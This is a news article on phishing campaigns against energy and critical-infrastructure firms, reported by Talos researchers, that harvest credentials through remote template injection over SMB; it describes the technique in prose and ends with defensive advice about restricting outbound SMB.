These phishing emails being used to steal credentials from critical infrastructure firms can silently harvest data without even using macros, warn researchers.
Hackers are targeting energy companies including those working in nuclear power and other critical infrastructures providers with a technique which puts a new spin on a tried and tested form of cyberattack.
Phishing has long been a successful method of attack, with cybercriminals crafting a legitimate looking email and sending it to the intended victim along with a malicious attachment. This, when executed, will run the code for dropping malware, be it for ransomware, stealing data, or other form of attack.
But now attackers are capable of running these phishing campaigns without the need for malicious code embedded in an attachment, instead downloading a template file injection over an SMB connection to silently harvest credentials, say researchers at Talos Intelligence.
While the attack method is currently only used to steal data, researchers warn it could be employed to drop other malware.
It’s the latest in a string of attacks which have exploited SMB flaws – although unlike Petya or WannaCry, there’s no known relation between this and EternalBlue, the leaked NSA windows exploit which has been used to carry out global ransomware attacks.
Cyberattacks against critical infrastructure are not a new phenomenon, but since May 2017 hackers have been using this new technique to target energy companies around the world, predominately in Europe and the United States, with the goal of stealing credentials of those working in critical infrastructure. It’s unknown who is behind the attacks or where they’re based.
Like other phishing campaigns, this attack uses emails relevant to the targets as a lure, in this instance often claiming to be environmental reports or a CV/resume with an attached Word document which attempts to harvest data when opened.
Researchers say these documents initially contained no indications of compromise or the malicious macros associated with this sort of campaign. However, the attachments look to download a template file from a particular IP address, which researchers found instead of code, contained instructions for a template injection, establishing the connection to an external server over SMB.
However, while the attack is performed by exploiting SMB, the phishing itself is handled over HTTPS, and the user credentials are harvested via Basic Authentication with a prompt for the credentials.
Talos has responded to the attacks by contacting affected customers and ensuring “they were aware of and capable of responding to the threat”.
The researchers also say this threat “illustrates the importance of controlling your network traffic and not allowing outbound protocols such as SMB except where specifically required for your environment”.
However, Talos says it is unable to share all indicators of compromise or who specifically has been targeted due to the “the the nature in which we obtained intelligence related to these attacks”